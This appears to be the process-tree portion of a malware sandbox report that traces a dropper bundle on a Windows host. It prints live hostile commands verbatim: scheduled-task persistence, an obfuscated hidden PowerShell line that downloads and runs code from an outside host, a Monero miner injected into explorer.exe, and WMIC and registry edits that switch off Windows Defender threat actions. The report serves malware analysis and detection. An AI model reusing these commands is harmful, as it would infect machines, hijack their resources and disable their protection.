C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:8412
-
-
-
-
-
C:\Users\Admin\Documents\1RWl7yriNyjXtTQkX0aS3CZn.exe"C:\Users\Admin\Documents\1RWl7yriNyjXtTQkX0aS3CZn.exe"8⤵PID:4992
-
-
C:\Users\Admin\Documents\SorEG6bFaQqxi2HiQ7V80zOQ.exe"C:\Users\Admin\Documents\SorEG6bFaQqxi2HiQ7V80zOQ.exe"8⤵PID:2700
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:7960
-
-
-
C:\Users\Admin\Documents\vMwIYmBFTFbdkHYKDHeR2Pq5.exe"C:\Users\Admin\Documents\vMwIYmBFTFbdkHYKDHeR2Pq5.exe"6⤵PID:5788
-
C:\Users\Admin\AppData\Roaming\7723618.scr"C:\Users\Admin\AppData\Roaming\7723618.scr" /S7⤵PID:6652
-
-
C:\Users\Admin\AppData\Roaming\5735546.scr"C:\Users\Admin\AppData\Roaming\5735546.scr" /S7⤵PID:7552
-
-
C:\Users\Admin\AppData\Roaming\2099048.scr"C:\Users\Admin\AppData\Roaming\2099048.scr" /S7⤵PID:2352
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵PID:584
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:5540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3988 -
C:\Users\Admin\AppData\Roaming\1395408.scr"C:\Users\Admin\AppData\Roaming\1395408.scr" /S6⤵PID:4868
-
-
C:\Users\Admin\AppData\Roaming\3036575.scr"C:\Users\Admin\AppData\Roaming\3036575.scr" /S6⤵PID:4916
-
-
C:\Users\Admin\AppData\Roaming\7511746.scr"C:\Users\Admin\AppData\Roaming\7511746.scr" /S6⤵PID:4352
-
-
C:\Users\Admin\AppData\Roaming\2800270.scr"C:\Users\Admin\AppData\Roaming\2800270.scr" /S6⤵PID:4260
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
PID:3184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵PID:512
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵PID:684
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\is-3L2F2.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-3L2F2.tmp\Sun1966fb31dd5a07.tmp" /SL5="$50056,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1966fb31dd5a07.exe"6⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\is-T6KM3.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-T6KM3.tmp\Ze2ro.exe" /S /UID=burnerch27⤵PID:4688
-
C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe"C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe" /VERYSILENT8⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\is-PF3U9.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-PF3U9.tmp\ultramediaburner.tmp" /SL5="$202A8,281924,62464,C:\Program Files\Google\IFGBFWQGEX\ultramediaburner.exe" /VERYSILENT9⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\5b-e27e6-212-d0098-753eac9ed05eb\Jetavolepy.exe"C:\Users\Admin\AppData\Local\Temp\5b-e27e6-212-d0098-753eac9ed05eb\Jetavolepy.exe"8⤵PID:6292
-
-
C:\Users\Admin\AppData\Local\Temp\60-0a67e-ab9-98ab7-e604854993cda\Jyfejesulae.exe"C:\Users\Admin\AppData\Local\Temp\60-0a67e-ab9-98ab7-e604854993cda\Jyfejesulae.exe"8⤵PID:4116
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exe /eufive & exit9⤵PID:4576
-
C:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\wvfltaui.ztm\GcleanerEU.exe /eufive10⤵PID:8348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:7664
-
C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exeC:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe /qn CAMPAIGN="654"10⤵PID:8528
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gfz1vmrg.ei2\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632113511 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:8156
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exe & exit9⤵PID:7528
-
C:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exeC:\Users\Admin\AppData\Local\Temp\vrasreof.lqa\anyname.exe10⤵PID:8696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exe /mixfive & exit9⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1tw1vjt1.oc1\gcleaner.exe /mixfive10⤵PID:8804
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵PID:3748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵PID:4072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe1⤵
- Executes dropped EXE
PID:2764 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 9082⤵
- Program crash
PID:5708
-
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun1905815e51282417.exeSun1905815e51282417.exe1⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun191101c1aaa.exeSun191101c1aaa.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:4968
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:3344
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:4124
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵PID:5176
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵PID:7160
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Executes dropped EXE
- Loads dropped DLL
- Creates scheduled task(s)
PID:4472
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:3964
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵PID:8232
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:5012
-
C:\ProgramData\5647709.exe"C:\ProgramData\5647709.exe"4⤵PID:5396
-
-
C:\ProgramData\3688907.exe"C:\ProgramData\3688907.exe"4⤵PID:6128
-
-
C:\ProgramData\5426748.exe"C:\ProgramData\5426748.exe"4⤵PID:5128
-
C:\ProgramData\5426748.exe"C:\ProgramData\5426748.exe"5⤵PID:5800
-
-
-
C:\ProgramData\6523842.exe"C:\ProgramData\6523842.exe"4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:5116
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5116 -s 15564⤵
- Program crash
PID:5888
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵PID:4124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"3⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe"4⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpE375_tmp.exe5⤵PID:2420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\is-0LMQ9.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-0LMQ9.tmp\setup_2.tmp" /SL5="$10280,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\is-H9BGM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-H9BGM.tmp\setup_2.tmp" /SL5="$202A6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\is-CP6GK.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-CP6GK.tmp\postback.exe" ss17⤵PID:3588
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss18⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵PID:4428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"10⤵PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"9⤵PID:6628
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"10⤵PID:7800
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dll"11⤵PID:7900
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"9⤵PID:7220
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"10⤵PID:7712
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\JXNSQ1AY7.dlliriqF3G37.dll"11⤵PID:7808
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵PID:5340
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵PID:5568
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:4248
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone1⤵
- Executes dropped EXE
PID:4160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 6762⤵
- Program crash
PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 5922⤵
- Program crash
PID:5380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 6642⤵
- Program crash
PID:3808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 6562⤵
- Program crash
PID:4488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8882⤵
- Program crash
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 9562⤵
- Program crash
PID:6220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 11762⤵
- Program crash
PID:6676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 11882⤵
- Program crash
PID:7032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 12842⤵
- Program crash
PID:4548
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 12762⤵
- Program crash
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
C:\Users\Admin\AppData\Local\Temp\7zS093FEA51\Sun193fda712d9f1.exeSun193fda712d9f1.exe1⤵
- Executes dropped EXE
PID:1792
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a1⤵PID:636
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 6801⤵
- Program crash
PID:4716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4352 -s 9561⤵
- Program crash
PID:5552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 8401⤵
- Program crash
PID:2628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 8561⤵
- Program crash
PID:5916
-
C:\Users\Admin\AppData\Roaming\7511746.scr"C:\Users\Admin\AppData\Roaming\7511746.scr"1⤵PID:5208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 8801⤵
- Program crash
PID:6024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 9721⤵
- Program crash
PID:4240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 9561⤵
- Program crash
PID:5092
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:3344
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4468
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6296 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6336
-
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu1⤵PID:7124
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7368
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:680
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8204
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8652
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1296
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1E9EEFE77AC7AFC4957DE756C3B27DB0 C2⤵PID:8284
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3FB30D8526D17EA7C9CBD93B3EF4DD5B2⤵PID:8388
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:9176
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8096
-
C:\Users\Admin\AppData\Local\Temp\FAFC.exeC:\Users\Admin\AppData\Local\Temp\FAFC.exe1⤵PID:4912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5080
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8804 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\39DB.exeC:\Users\Admin\AppData\Local\Temp\39DB.exe1⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\QfXqdKG.exe W8 /site_id 668658 /S1⤵PID:7988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:4548
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:9068
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:3028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:6704
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:8780
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:9476
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:8392
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:6792
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 